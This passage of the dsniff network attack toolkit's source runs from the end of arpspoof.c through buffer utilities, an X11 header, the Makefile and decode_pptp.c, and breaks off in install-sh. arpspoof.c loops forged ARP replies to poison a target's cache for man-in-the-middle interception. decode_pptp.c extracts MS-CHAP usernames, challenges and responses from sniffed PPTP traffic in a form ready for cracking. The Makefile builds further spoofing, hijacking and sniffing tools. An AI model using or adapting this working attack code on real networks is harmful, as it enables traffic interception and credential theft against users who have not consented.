*)sha)); 83 | } 84 | return (libnet_write_link_layer(llif, dev, pkt, sizeof(pkt)) == sizeof(pkt)); 85 | } 86 | 87 | #ifdef __linux__ 88 | static int 89 | arp_force(in_addr_t dst) 90 | { 91 | struct sockaddr_in sin; 92 | int i, fd; 93 | 94 | if ((fd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0) 95 | return (0); 96 | 97 | memset(&sin, 0, sizeof(sin)); 98 | sin.sin_family = AF_INET; 99 | sin.sin_addr.s_addr = dst; 100 | sin.sin_port = htons(67); 101 | 102 | i = sendto(fd, NULL, 0, 0, (struct sockaddr *)&sin, sizeof(sin)); 103 | 104 | close(fd); 105 | 106 | return (i == 0); 107 | } 108 | #endif 109 | 110 | static int 111 | arp_find(in_addr_t ip, struct ether_addr *mac) 112 | { 113 | int i = 0; 114 | 115 | do { 116 | if (arp_cache_lookup(ip, mac, intf) == 0) 117 | return (1); 118 | #ifdef __linux__ 119 | /* XXX - force the kernel to arp. feh. */ 120 | arp_force(ip); 121 | #else 122 | arp_send(llif, intf, ARPOP_REQUEST, NULL, 0, NULL, ip); 123 | #endif 124 | sleep(1); 125 | } 126 | while (i++ < 3); 127 | 128 | return (0); 129 | } 130 | 131 | static void 132 | cleanup(int sig) 133 | { 134 | int i; 135 | 136 | if (arp_find(spoof_ip, &spoof_mac)) { 137 | for (i = 0; i < 3; i++) { 138 | /* XXX - on BSD, requires ETHERSPOOF kernel. */ 139 | arp_send(llif, intf, ARPOP_REPLY, 140 | (u_char *)&spoof_mac, spoof_ip, 141 | (target_ip ? (u_char *)&target_mac : NULL), 142 | target_ip); 143 | sleep(1); 144 | } 145 | } 146 | exit(0); 147 | } 148 | 149 | int 150 | main(int argc, char *argv[]) 151 | { 152 | extern char *optarg; 153 | extern int optind; 154 | char ebuf[PCAP_ERRBUF_SIZE]; 155 | int c; 156 | 157 | intf = NULL; 158 | spoof_ip = target_ip = 0; 159 | 160 | while ((c = getopt(argc, argv, "i:t:h?V")) != -1) { 161 | switch (c) { 162 | case 'i': 163 | intf = optarg; 164 | break; 165 | case 't': 166 | if ((target_ip = libnet_name_resolve(optarg, 1)) == -1) 167 | usage(); 168 | break; 169 | default: 170 | usage(); 171 | } 172 | } 173 | argc -= optind; 174 | argv += optind; 175 | 176 | if (argc != 1) 177 | usage(); 178 | 179 | if ((spoof_ip = libnet_name_resolve(argv[0], 1)) == -1) 180 | usage(); 181 | 182 | if (intf == NULL && (intf = pcap_lookupdev(ebuf)) == NULL) 183 | errx(1, "%s", ebuf); 184 | 185 | if ((llif = libnet_open_link_interface(intf, ebuf)) == 0) 186 | errx(1, "%s", ebuf); 187 | 188 | if (target_ip != 0 && !arp_find(target_ip, &target_mac)) 189 | errx(1, "couldn't arp for host %s", 190 | libnet_host_lookup(target_ip, 0)); 191 | 192 | signal(SIGHUP, cleanup); 193 | signal(SIGINT, cleanup); 194 | signal(SIGTERM, cleanup); 195 | 196 | for (;;) { 197 | arp_send(llif, intf, ARPOP_REPLY, NULL, spoof_ip, 198 | (target_ip ? (u_char *)&target_mac : NULL), 199 | target_ip); 200 | sleep(2); 201 | } 202 | /* NOTREACHED */ 203 | 204 | exit(0); 205 | } 206 | -------------------------------------------------------------------------------- /buf.c: -------------------------------------------------------------------------------- 1 | /* 2 | * buf.c 3 | * 4 | * Copyright (c) 2000 Dug Song 5 | * 6 | * $Id: buf.c,v 1.7 2001/03/15 08:32:59 dugsong Exp $ 7 | */ 8 | 9 | #include "config.h" 10 | 11 | #include 12 | #include 13 | 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | 21 | #include "buf.h" 22 | 23 | void 24 | buf_init(buf_t buf, u_char *data, int len) 25 | { 26 | buf->base = data; 27 | buf->end = buf->size = len; 28 | buf->offset = 0; 29 | } 30 | 31 | buf_t 32 | buf_new(int size) 33 | { 34 | buf_t buf; 35 | 36 | if ((buf = malloc(sizeof(*buf))) == NULL) 37 | return (NULL); 38 | 39 | if ((buf->base = malloc(size)) == NULL) { 40 | free(buf); 41 | return (NULL); 42 | } 43 | buf->size = size; 44 | buf->offset = 0; 45 | buf->end = 0; 46 | 47 | return (buf); 48 | } 49 | 50 | void 51 | buf_free(buf_t buf) 52 | { 53 | if (buf->base != NULL) { 54 | free(buf->base); 55 | } 56 | free(buf); 57 | } 58 | 59 | int 60 | buf_seek(buf_t buf, int off, int whence) 61 | { 62 | if ((whence == SEEK_SET) && (off <= buf->size)) { 63 | buf->offset = off; 64 | } 65 | else if ((whence == SEEK_CUR) && ((buf->offset + off) <= buf->size)) { 66 | buf->offset += off; 67 | } 68 | else return (-1); 69 | 70 | return (buf->offset); 71 | } 72 | 73 | int 74 | buf_get(buf_t buf, void *dst, int len) 75 | { 76 | u_char *p; 77 | int i; 78 | 79 | p = dst; 80 | 81 | if (buf_len(buf) < len) { 82 | return (-1); 83 | } 84 | for (i = 0; i < len; i++) 85 | p[i] = buf->base[buf->offset + i]; 86 | 87 | buf->offset += len; 88 | 89 | return (len); 90 | } 91 | 92 | int 93 | buf_put(buf_t buf, void *src, int len) 94 | { 95 | if (buf->offset + len > buf->size) { 96 | return (-1); 97 | } 98 | memcpy(buf_ptr(buf), src, len); 99 | 100 | buf->offset += len; 101 | 102 | return (len); 103 | } 104 | 105 | int 106 | buf_putf(buf_t buf, const char *fmt, ...) 107 | { 108 | va_list ap; 109 | int i; 110 | 111 | va_start(ap, fmt); 112 | i = vsnprintf(buf_ptr(buf), buf_len(buf), fmt, ap); 113 | va_end(ap); 114 | 115 | buf_skip(buf, i); 116 | 117 | return (i); 118 | } 119 | 120 | void 121 | buf_end(buf_t buf) 122 | { 123 | buf->end = buf->offset; 124 | buf->offset = 0; 125 | } 126 | 127 | int 128 | buf_index(buf_t buf, void *ptr, int len) 129 | { 130 | u_char *p, *q; 131 | 132 | p = buf_ptr(buf); 133 | q = buf->base + buf->end; 134 | 135 | for (; q - p >= len; p++) { 136 | if (memcmp(p, ptr, len) == 0) 137 | return (p - buf_ptr(buf)); 138 | } 139 | return (-1); 140 | } 141 | 142 | int 143 | buf_rindex(buf_t buf, void *ptr, int len) 144 | { 145 | u_char *p, *q; 146 | 147 | p = buf->base + buf->end - len; 148 | q = buf_ptr(buf); 149 | 150 | for (; p > q; p--) { 151 | if (memcmp(p, ptr, len) == 0) 152 | return (p - q); 153 | } 154 | return (-1); 155 | } 156 | 157 | int 158 | buf_cmp(buf_t buf, void *ptr, int len) 159 | { 160 | if (buf_len(buf) < len) 161 | return (-1); 162 | 163 | return (memcmp(buf_ptr(buf), ptr, len)); 164 | } 165 | 166 | buf_t 167 | buf_tok(buf_t buf, void *sep, int len) 168 | { 169 | static struct buf *savebuf, tokbuf; 170 | int off; 171 | 172 | if (buf != NULL) 173 | savebuf = buf; 174 | 175 | if (sep == NULL && buf_len(savebuf) >= len) { 176 | tokbuf.base = buf_ptr(savebuf); 177 | tokbuf.offset = 0; 178 | tokbuf.size = tokbuf.end = len; 179 | buf_skip(savebuf, len); 180 | } 181 | else if ((off = buf_index(savebuf, sep, len)) != -1) { 182 | tokbuf.base = buf_ptr(savebuf); 183 | tokbuf.offset = 0; 184 | tokbuf.size = tokbuf.end = off; 185 | buf_skip(savebuf, off + len); 186 | } 187 | else if (buf_len(savebuf) > 0) { 188 | tokbuf.base = buf_ptr(savebuf); 189 | tokbuf.offset = 0; 190 | tokbuf.size = tokbuf.end = buf_len(savebuf); 191 | savebuf->offset = savebuf->end; 192 | } 193 | else return (NULL); 194 | 195 | return (&tokbuf); 196 | } 197 | 198 | buf_t 199 | buf_getbuf(buf_t buf, int offset, int len) 200 | { 201 | buf_t b; 202 | 203 | if (buf->offset + offset + len > buf->end) 204 | return (NULL); 205 | 206 | buf_skip(buf, offset); 207 | 208 | if ((b = buf_new(len)) != NULL) { 209 | buf_put(b, buf_ptr(buf), len); 210 | buf_end(b); 211 | } 212 | buf_skip(buf, len); 213 | 214 | return (b); 215 | } 216 | 217 | buf_t 218 | buf_getword(buf_t buf, void *sep, int len) 219 | { 220 | buf_t b; 221 | int off; 222 | 223 | if ((off = buf_index(buf, sep, len)) < 0) 224 | return (NULL); 225 | 226 | if ((b = buf_new(off)) != NULL) { 227 | buf_put(b, buf_ptr(buf), off); 228 | buf_end(b); 229 | buf_skip(buf, off + len); 230 | } 231 | return (b); 232 | } 233 | 234 | char * 235 | buf_strdup(buf_t buf) 236 | { 237 | char *p; 238 | int i; 239 | 240 | i = buf_len(buf); 241 | 242 | if ((p = malloc(i + 1)) == NULL) 243 | err(1, "malloc"); 244 | 245 | memcpy(p, buf_ptr(buf), i); 246 | 247 | p[i] = '\0'; 248 | 249 | return (p); 250 | } 251 | 252 | int 253 | buf_isascii(buf_t buf) 254 | { 255 | u_char *p, *q; 256 | 257 | p = buf_ptr(buf); 258 | q = buf->base + buf->end; 259 | 260 | for (; p < q; p++) 261 | if (!isascii(*p)) return (0); 262 | 263 | return (1); 264 | } 265 | -------------------------------------------------------------------------------- /vroot.h: -------------------------------------------------------------------------------- 1 | /*****************************************************************************/ 2 | /** Copyright 1991 by Andreas Stolcke **/ 3 | /** Copyright 1990 by Solbourne Computer Inc. **/ 4 | /** Longmont, Colorado **/ 5 | /** **/ 6 | /** All Rights Reserved **/ 7 | /** **/ 8 | /** Permission to use, copy, modify, and distribute this software and **/ 9 | /** its documentation for any purpose and without fee is hereby **/ 10 | /** granted, provided that the above copyright notice appear in all **/ 11 | /** copies and that both that copyright notice and this permis- **/ 12 | /** sion notice appear in supporting documentation, and that the **/ 13 | /** name of Solbourne not be used in advertising **/ 14 | /** in publicity pertaining to distribution of the software without **/ 15 | /** specific, written prior permission. **/ 16 | /** **/ 17 | /** ANDREAS STOLCKE AND SOLBOURNE COMPUTER INC. DISCLAIMS ALL WARRANTIES **/ 18 | /** WITH REGARD TO THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF **/ 19 | /** MERCHANTABILITY AND FITNESS, IN NO EVENT SHALL ANDREAS STOLCKE **/ 20 | /** OR SOLBOURNE BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL **/ 21 | /** DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA **/ 22 | /** OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER **/ 23 | /** TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE **/ 24 | /** OR PERFORMANCE OF THIS SOFTWARE. **/ 25 | /*****************************************************************************/ 26 | /* 27 | * vroot.h -- Virtual Root Window handling header file 28 | * 29 | * This header file redefines the X11 macros RootWindow and DefaultRootWindow, 30 | * making them look for a virtual root window as provided by certain `virtual' 31 | * window managers like swm and tvtwm. If none is found, the ordinary root 32 | * window is returned, thus retaining backward compatibility with standard 33 | * window managers. 34 | * The function implementing the virtual root lookup remembers the result of 35 | * its last invocation to avoid overhead in the case of repeated calls 36 | * on the same display and screen arguments. 37 | * The lookup code itself is taken from Tom LaStrange's ssetroot program. 38 | * 39 | * Most simple root window changing X programs can be converted to using 40 | * virtual roots by just including 41 | * 42 | * #include 43 | * 44 | * after all the X11 header files. It has been tested on such popular 45 | * X clients as xphoon, xfroot, xloadimage, and xaqua. 46 | * It also works with the core clients xprop, xwininfo, xwd, and editres 47 | * (and is necessary to get those clients working under tvtwm). 48 | * It does NOT work with xsetroot; get the xsetroot replacement included in 49 | * the tvtwm distribution instead. 50 | * 51 | * Andreas Stolcke , 9/7/90 52 | * - replaced all NULL's with properly cast 0's, 5/6/91 53 | * - free children list (suggested by Mark Martin ), 5/16/91 54 | * - include X11/Xlib.h and support RootWindowOfScreen, too 9/17/91 55 | */ 56 | 57 | #ifndef _VROOT_H_ 58 | #define _VROOT_H_ 59 | 60 | #include 61 | #include 62 | #include 63 | 64 | static Window 65 | VirtualRootWindowOfScreen(screen) 66 | Screen *screen; 67 | { 68 | static Screen *save_screen = (Screen *)0; 69 | static Window root = (Window)0; 70 | 71 | if (screen != save_screen) { 72 | Display *dpy = DisplayOfScreen(screen); 73 | Atom __SWM_VROOT = None; 74 | int i; 75 | Window rootReturn, parentReturn, *children; 76 | unsigned int numChildren; 77 | 78 | root = RootWindowOfScreen(screen); 79 | 80 | /* go look for a virtual root */ 81 | __SWM_VROOT = XInternAtom(dpy, "__SWM_VROOT", False); 82 | if (XQueryTree(dpy, root, &rootReturn, &parentReturn, 83 | &children, &numChildren)) { 84 | for (i = 0; i < numChildren; i++) { 85 | Atom actual_type; 86 | int actual_format; 87 | unsigned long nitems, bytesafter; 88 | Window *newRoot = (Window *)0; 89 | 90 | if (XGetWindowProperty(dpy, children[i], 91 | __SWM_VROOT, 0, 1, False, XA_WINDOW, 92 | &actual_type, &actual_format, 93 | &nitems, &bytesafter, 94 | (unsigned char **) &newRoot) == Success 95 | && newRoot) { 96 | root = *newRoot; 97 | break; 98 | } 99 | } 100 | if (children) 101 | XFree((char *)children); 102 | } 103 | 104 | save_screen = screen; 105 | } 106 | 107 | return root; 108 | } 109 | 110 | #undef RootWindowOfScreen 111 | #define RootWindowOfScreen(s) VirtualRootWindowOfScreen(s) 112 | 113 | #undef RootWindow 114 | #define RootWindow(dpy,screen) VirtualRootWindowOfScreen(ScreenOfDisplay(dpy,screen)) 115 | 116 | #undef DefaultRootWindow 117 | #define DefaultRootWindow(dpy) VirtualRootWindowOfScreen(DefaultScreenOfDisplay(dpy)) 118 | 119 | #endif /* _VROOT_H_ */ 120 | -------------------------------------------------------------------------------- /Makefile.in: -------------------------------------------------------------------------------- 1 | # 2 | # Makefile for dsniff 3 | # 4 | # Dug Song 5 | # 6 | # $Id: Makefile.in,v 1.42 2001/03/15 08:34:42 dugsong Exp $ 7 | 8 | srcdir = @srcdir@ 9 | VPATH = @srcdir@ 10 | 11 | install_prefix = 12 | prefix = @prefix@ 13 | exec_prefix = @exec_prefix@ 14 | libdir = @libdir@ 15 | sbindir = @sbindir@ 16 | mandir = @mandir@ 17 | 18 | CC = @CC@ 19 | CFLAGS = @CFLAGS@ -DDSNIFF_LIBDIR=\"$(libdir)/\" 20 | LDFLAGS = @LDFLAGS@ 21 | 22 | PCAPINC = @PCAPINC@ 23 | PCAPLIB = @PCAPLIB@ 24 | 25 | LNETINC = @LNETINC@ 26 | LNETLIB = @LNETLIB@ 27 | 28 | NIDSINC = @NIDSINC@ 29 | NIDSLIB = @NIDSLIB@ 30 | 31 | DBINC = @DBINC@ 32 | DBLIB = @DBLIB@ 33 | 34 | SSLINC = @SSLINC@ 35 | SSLLIB = @SSLLIB@ 36 | 37 | X11INC = @X_CFLAGS@ 38 | X11LIB = @X_LIBS@ @X_PRE_LIBS@ -lXmu -lX11 @X_EXTRA_LIBS@ 39 | 40 | INCS = -I. $(NIDSINC) $(PCAPINC) $(LNETINC) $(DBINC) $(SSLINC) $(X11INC) \ 41 | -I$(srcdir)/missing 42 | LIBS = @LIBS@ -L$(srcdir) -lmissing 43 | 44 | INSTALL = @INSTALL@ 45 | INSTALL_PROGRAM = @INSTALL_PROGRAM@ 46 | INSTALL_DATA = @INSTALL_DATA@ 47 | 48 | RANLIB = @RANLIB@ 49 | 50 | HDRS = asn1.h base64.h buf.h decode.h hex.h magic.h options.h \ 51 | pathnames.h pcaputil.h record.h rpc.h tcp_raw.h trigger.h \ 52 | version.h vroot.h 53 | 54 | SRCS = asn1.c base64.c buf.c hex.c magic.c mount.c pcaputil.c rpc.c \ 55 | tcp_raw.c trigger.c record.c dsniff.c decode.c decode_aim.c \ 56 | decode_citrix.c decode_cvs.c decode_ftp.c decode_hex.c \ 57 | decode_http.c decode_icq.c decode_imap.c decode_irc.c \ 58 | decode_ldap.c decode_mmxp.c decode_mountd.c decode_napster.c \ 59 | decode_nntp.c decode_oracle.c decode_ospf.c decode_pcanywhere.c \ 60 | decode_pop.c decode_portmap.c decode_postgresql.c decode_pptp.c \ 61 | decode_rip.c decode_rlogin.c decode_smb.c decode_smtp.c \ 62 | decode_sniffer.c decode_snmp.c decode_socks.c decode_tds.c \ 63 | decode_telnet.c decode_vrrp.c decode_yp.c decode_x11.c 64 | 65 | GEN = mount.h mount.c nfs_prot.h nfs_prot.c 66 | 67 | OBJS = $(SRCS:.c=.o) 68 | 69 | LIBOBJS = dummy.o @LIBOBJS@ 70 | 71 | PROGS = arpspoof dnsspoof dsniff filesnarf macof mailsnarf msgsnarf \ 72 | sshmitm sshow tcpkill tcpnice @TCPHIJACK@ urlsnarf webmitm @WEBSPY@ 73 | 74 | CONFIGS = dsniff.magic dsniff.services dnsspoof.hosts 75 | 76 | .c.o: 77 | $(CC) $(CFLAGS) $(INCS) -c $(srcdir)/$*.c 78 | 79 | all: libmissing.a $(PROGS) 80 | 81 | mount.c: mount.x 82 | rpcgen -h mount.x -o mount.h 83 | rpcgen -c mount.x -o mount.c 84 | 85 | nfs_prot.c: nfs_prot.x 86 | rpcgen -h nfs_prot.x -o nfs_prot.h 87 | rpcgen -c nfs_prot.x -o nfs_prot.c 88 | 89 | $(LIBOBJS): 90 | $(CC) $(CFLAGS) $(INCS) -c $(srcdir)/missing/$*.c 91 | 92 | libmissing.a: $(LIBOBJS) 93 | ar -cr $@ $(LIBOBJS) 94 | $(RANLIB) $@ 95 | 96 | dsniff: $(HDRS) $(SRCS) $(OBJS) 97 | $(CC) $(LDFLAGS) -o $@ $(OBJS) $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) $(DBLIB) $(SSLLIB) 98 | 99 | arpspoof: arpspoof.o arp.o 100 | $(CC) $(LDFLAGS) -o $@ arpspoof.o arp.o $(LIBS) $(PCAPLIB) $(LNETLIB) 101 | 102 | dnsspoof: dnsspoof.o pcaputil.o 103 | $(CC) $(LDFLAGS) -o $@ dnsspoof.o pcaputil.o $(LIBS) $(PCAPLIB) $(LNETLIB) 104 | 105 | filesnarf: nfs_prot.o filesnarf.o pcaputil.o rpc.o 106 | $(CC) $(LDFLAGS) -o $@ filesnarf.o nfs_prot.o pcaputil.o rpc.o $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) 107 | 108 | macof: macof.o 109 | $(CC) $(LDFLAGS) -o $@ macof.o $(LIBS) $(PCAPLIB) $(LNETLIB) 110 | 111 | mailsnarf: mailsnarf.o buf.o pcaputil.o 112 | $(CC) $(LDFLAGS) -o $@ mailsnarf.o buf.o pcaputil.o $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) 113 | 114 | msgsnarf: msgsnarf.o buf.o pcaputil.o 115 | $(CC) $(LDFLAGS) -o $@ msgsnarf.o buf.o pcaputil.o $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) 116 | 117 | sshmitm: sshmitm.o buf.o hex.o record.o ssh.o sshcrypto.o 118 | $(CC) $(LDFLAGS) -o $@ sshmitm.o buf.o hex.o record.o ssh.o sshcrypto.o $(LIBS) $(LNETLIB) $(DBLIB) $(SSLLIB) 119 | 120 | sshow: sshow.o pcaputil.o 121 | $(CC) $(LDFLAGS) -o $@ sshow.o pcaputil.o $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) 122 | 123 | tcpkill: tcpkill.o pcaputil.o 124 | $(CC) $(LDFLAGS) -o $@ tcpkill.o pcaputil.o $(LIBS) $(PCAPLIB) $(LNETLIB) 125 | 126 | tcpnice: tcpnice.o pcaputil.o 127 | $(CC) $(LDFLAGS) -o $@ tcpnice.o pcaputil.o $(LIBS) $(PCAPLIB) $(LNETLIB) 128 | 129 | tcphijack: tcphijack.o pcaputil.o 130 | $(CC) $(LDFLAGS) -o $@ tcphijack.o pcaputil.o $(LIBS) $(PCAPLIB) $(LNETLIB) 131 | 132 | urlsnarf: urlsnarf.o base64.o buf.o pcaputil.o 133 | $(CC) $(LDFLAGS) -o $@ urlsnarf.o base64.o buf.o pcaputil.o $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) 134 | 135 | webmitm: webmitm.o base64.o buf.o decode_http.o record.o 136 | $(CC) $(LDFLAGS) -o $@ webmitm.o base64.o buf.o decode_http.o record.o $(LIBS) $(LNETLIB) $(DBLIB) $(SSLLIB) 137 | 138 | webspy: webspy.o base64.o buf.o remote.o 139 | $(CC) $(LDFLAGS) -o $@ webspy.o base64.o buf.o remote.o $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) $(X11LIB) 140 | 141 | install: 142 | test -d $(install_prefix)$(sbindir) || \ 143 | $(INSTALL) -d $(install_prefix)$(sbindir) 144 | for file in $(PROGS); do \ 145 | $(INSTALL_PROGRAM) -m 755 $$file $(install_prefix)$(sbindir); \ 146 | done 147 | test -d $(install_prefix)$(libdir) || \ 148 | $(INSTALL) -d $(install_prefix)$(libdir) 149 | for file in $(CONFIGS); do \ 150 | $(INSTALL_DATA) $$file $(install_prefix)$(libdir); \ 151 | done 152 | test -d $(install_prefix)$(mandir)/man8 || \ 153 | $(INSTALL) -d $(install_prefix)$(mandir)/man8 154 | for file in *.8; do \ 155 | $(INSTALL_DATA) $$file $(install_prefix)$(mandir)/man8; \ 156 | done 157 | 158 | clean: 159 | rm -f *.o *~ $(GEN) libmissing.a $(PROGS) webmitm.crt 160 | 161 | distclean: clean 162 | rm -f Makefile config.h config.cache config.log config.status 163 | 164 | # EOF 165 | -------------------------------------------------------------------------------- /decode_pptp.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_pptp.c 3 | * 4 | * Microsoft PPTP MS-CHAP. Derived from Aleph One's anger.c. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * Copyright (c) 2000 Aleph One 8 | * 9 | * $Id: decode_pptp.c,v 1.4 2001/03/15 08:33:02 dugsong Exp $ 10 | */ 11 | 12 | #include "config.h" 13 | 14 | #include 15 | #include 16 | 17 | #include 18 | #include 19 | 20 | #include "buf.h" 21 | #include "decode.h" 22 | 23 | struct pptp_gre_header { 24 | u_char flags; /* bitfield */ 25 | u_char ver; /* should be PPTP_GRE_VER (enhanced GRE) */ 26 | u_short protocol; /* should be PPTP_GRE_PROTO (ppp-encaps) */ 27 | u_short payload_len; /* size of ppp payload, not inc. gre header */ 28 | u_short call_id; /* peer's call_id for this session */ 29 | u_int32_t seq; /* sequence number. Present if S==1 */ 30 | u_int32_t ack; /* seq number of highest packet recieved by */ 31 | /* sender in this session */ 32 | }; 33 | 34 | #define PPTP_GRE_PROTO 0x880B 35 | #define PPTP_GRE_VER 0x1 36 | 37 | #define PPTP_GRE_IS_C(f) ((f) & 0x80) 38 | #define PPTP_GRE_IS_R(f) ((f) & 0x40) 39 | #define PPTP_GRE_IS_K(f) ((f) & 0x20) 40 | #define PPTP_GRE_IS_S(f) ((f) & 0x10) 41 | #define PPTP_GRE_IS_A(f) ((f) & 0x80) 42 | 43 | struct ppp_header { 44 | u_char address; 45 | u_char control; 46 | u_short proto; 47 | }; 48 | 49 | #define PPP_PROTO_CHAP 0xc223 50 | 51 | struct ppp_lcp_chap_header { 52 | u_char code; 53 | u_char ident; 54 | u_short length; 55 | }; 56 | 57 | #define PPP_CHAP_CODE_CHALLENGE 1 58 | #define PPP_CHAP_CODE_RESPONSE 2 59 | 60 | struct ppp_chap_challenge { 61 | u_char size; 62 | union { 63 | u_char challenge_v1[8]; 64 | u_char challenge_v2[16]; 65 | struct { 66 | u_char lanman[24]; 67 | u_char nt[24]; 68 | u_char flag; 69 | } response_v1; 70 | struct { 71 | u_char peer_challenge[16]; 72 | u_char reserved[8]; 73 | u_char nt[24]; 74 | u_char flag; 75 | } response_v2; 76 | } value; 77 | /* name */ 78 | }; 79 | 80 | struct challenge { 81 | u_char version; 82 | u_char challenge[16]; 83 | }; 84 | 85 | int 86 | decode_pptp(u_char *buf, int len, u_char *obuf, int olen) 87 | { 88 | static struct challenge save_challenge; 89 | struct buf outbuf; 90 | struct pptp_gre_header *pgh; 91 | struct ppp_header *ppp; 92 | struct ppp_lcp_chap_header *chap; 93 | struct ppp_chap_challenge *chapch; 94 | u_short proto; 95 | u_char *p, name[64], digest[SHA_DIGEST_LENGTH]; 96 | SHA_CTX ctx; 97 | int i, pghlen; 98 | 99 | buf_init(&outbuf, obuf, olen); 100 | 101 | if (len < (pghlen = sizeof(*pgh))) 102 | return (0); 103 | 104 | pgh = (struct pptp_gre_header *)buf; 105 | 106 | if ((pgh->ver & 0x7f) != PPTP_GRE_VER || 107 | ntohs(pgh->protocol) != PPTP_GRE_PROTO || 108 | PPTP_GRE_IS_C(pgh->flags) || PPTP_GRE_IS_R(pgh->flags) || 109 | PPTP_GRE_IS_K(pgh->flags) == 0 || (pgh->flags & 0xf) != 0) { 110 | return (0); 111 | } 112 | if (PPTP_GRE_IS_S(pgh->flags) == 0) 113 | return (0); 114 | 115 | if (PPTP_GRE_IS_A(pgh->ver) == 0) 116 | pghlen -= sizeof(pgh->ack); 117 | 118 | if (len - pghlen < ntohs(pgh->payload_len)) 119 | return (0); 120 | 121 | ppp = (struct ppp_header *)(pgh + 1); 122 | 123 | if (ppp->address != 0xff && ppp->control != 0x3) { 124 | proto = pntohs(ppp); 125 | chap = (struct ppp_lcp_chap_header *) 126 | ((u_char *)ppp + sizeof(proto)); 127 | } 128 | else { 129 | proto = ntohs(ppp->proto); 130 | chap = (struct ppp_lcp_chap_header *)(ppp + 1); 131 | } 132 | if (proto != PPP_PROTO_CHAP) 133 | return (0); 134 | 135 | switch (chap->code) { 136 | 137 | case PPP_CHAP_CODE_CHALLENGE: 138 | chapch = (struct ppp_chap_challenge *)(chap + 1); 139 | 140 | if (chapch->size == 8) { 141 | save_challenge.version = 1; 142 | memcpy(save_challenge.challenge, 143 | chapch->value.challenge_v1, 8); 144 | } 145 | else if (chapch->size == 16) { 146 | save_challenge.version = 2; 147 | memcpy(save_challenge.challenge, 148 | chapch->value.challenge_v2, 16); 149 | } 150 | else save_challenge.version = 0; 151 | break; 152 | 153 | case PPP_CHAP_CODE_RESPONSE: 154 | if (save_challenge.version == 0) 155 | break; 156 | 157 | chapch = (struct ppp_chap_challenge *)(chap + 1); 158 | i = ntohs(chap->length) - 54; 159 | if (i > 63) i = 63; 160 | memcpy(name, (u_char *)chap + 54, i); 161 | name[i] = '\0'; 162 | 163 | buf_putf(&outbuf, "%s:0:", name); 164 | 165 | if (save_challenge.version == 1) { 166 | for (i = 0; i < 8; i++) { 167 | buf_putf(&outbuf, "%02X", 168 | save_challenge.challenge[i]); 169 | } 170 | buf_put(&outbuf, ":", 1); 171 | 172 | for (i = 0; i < 24; i++) { 173 | buf_putf(&outbuf, "%02X", 174 | chapch->value.response_v1.lanman[i]); 175 | } 176 | buf_put(&outbuf, ":", 1); 177 | 178 | for (i = 0; i < 24; i++) { 179 | buf_putf(&outbuf, "%02X", 180 | chapch->value.response_v1.nt[i]); 181 | } 182 | buf_put(&outbuf, "\n", 1); 183 | } 184 | else if (save_challenge.version == 2) { 185 | chapch = (struct ppp_chap_challenge *)(chap + 1); 186 | if ((p = strchr(name, '\\')) == NULL) 187 | p = name; 188 | 189 | SHA1_Init(&ctx); 190 | SHA1_Update(&ctx, chapch->value.response_v2.peer_challenge, 16); 191 | SHA1_Update(&ctx, save_challenge.challenge, 16); 192 | SHA1_Update(&ctx, p, strlen(p)); 193 | SHA1_Final(digest, &ctx); 194 | 195 | for (i = 0; i < 8; i++) { 196 | buf_putf(&outbuf, "%02X", digest[i]); 197 | } 198 | buf_putf(&outbuf, ":000000000000000000000000000000000000000000000000:"); 199 | for (i = 0; i < 24; i++) { 200 | buf_putf(&outbuf, "%02X", 201 | chapch->value.response_v2.nt[i]); 202 | } 203 | buf_put(&outbuf, "\n", 1); 204 | 205 | save_challenge.version = 0; 206 | } 207 | break; 208 | } 209 | buf_end(&outbuf); 210 | 211 | return (buf_len(&outbuf)); 212 | } 213 | 214 | -------------------------------------------------------------------------------- /install-sh: -------------------------------------------------------------------------------- 1 | #! /bin/sh 2 | # 3 | # install - install a program, script, or datafile 4 | # This comes from X11R5. 5 | # 6 | # Calling this script install-sh is preferred over install.sh, to prevent 7 | # `make' implicit rules from creating a file called install from it 8 | # when there is no Makefile. 9 | # 10 | # This script is compatible with the BSD install script, but was written 11 | # from scratch. 12 | # 13 | 14 | 15 | # set DOITPROG to echo to test this script 16 | 17 | # Don't use :- since 4.3BSD and earlier shells don't like it. 18 | doit="${DOITPROG-}" 19 | 20 | 21 | # put in absolute paths if you don't have them in your path; or use env. vars. 22 | 23 | mvprog="${MVPROG-mv}" 24 | cpprog="${CPPROG-cp}" 25 | chmodprog="${CHMODPROG-chmod}" 26 | chownprog="${CHOWNPROG-chown}" 27 | chgrpprog="${CHGRPPROG-chgrp}" 28 | stripprog="${STRIPPROG-strip}" 29 | rmprog="${RMPROG-rm}" 30 | mkdirprog="${MKDIRPROG-mkdir}" 31 | 32 | tranformbasename="" 33 | transform_arg="" 34 | instcmd="$mvprog" 35 | chmodcmd="$chmodprog 0755" 36 | chowncmd="" 37 | chgrpcmd="" 38 | stripcmd="" 39 | rmcmd="$rmprog -f" 40 | mvcmd="$mvprog" 41 | src="" 42 | dst="" 43 | dir_arg="" 44 | 45 | while [ x"$1" != x ]; do 46 | case $1 in 47 | -c) instcmd="$cpprog" 48 | shift 49 | continue;; 50 | 51 | -d) dir_arg=true 52 | shift 53 | continue;; 54 | 55 | -m) chmodcmd="$chmodprog $2" 56 | shift 57 | shift 58 | continue;; 59 | 60 | -o) chowncmd="$chownprog $2" 61 | shift 62 | shift 63 | continue;; 64 | 65 | -g) chgrpcmd="$chgrpprog $2" 66 | shift 67 | shift 68 | continue;; 69 | 70 | -s) stripcmd="$stripprog" 71 | shift 72 | continue;; 73 | 74 | -t=*) transformarg=`echo $1 | sed 's/-t=//'` 75 | shift 76 | continue;; 77 | 78 